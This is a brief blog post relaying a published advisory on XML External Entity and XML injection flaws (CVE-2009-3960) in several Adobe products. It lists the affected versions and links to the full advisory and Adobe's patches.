« Post on Abusing Windows Communication Foundation to Perform Remote Port Scans | Main | XSS, SQL Injection and Fuzzing Barcode Cheat Sheet »

Multiple Adobe products vulnerable to XML External Entity Injection And XML Injection

I haven't really been posting advisories on this website for the past year, however a series of XML Injection/XXe vulnerabilities in Adobe products caught my eye. XML Injection is to web services, what XSS is to web pages (an attacker controllable application response able to perform abuses against the consumer). This advisory provides a good explanation and examples of these rarely discussed attack types.

Products affected
  • BlazeDS 3.2 and earlier versions
  • LiveCycle 9.0, 8.2.1, and 8.0.1
  • LiveCycle Data Services 3.0, 2.6.1, and 2.5.1
  • Flex Data Services 2.0.1
  • ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2

For those interested in attacking XML consumers and Web Services be sure to also check out the WASC Threat Classification's list of XML related attacks.

Full Advisory: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
Adobe Patches: http://www.adobe.com/support/security/bulletins/apsb10-05.html
Mitre CVE-2009-3960: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3960


Feed You can follow this conversation by subscribing to the comment feed for this post.

All Comments are Moderated and will be delayed!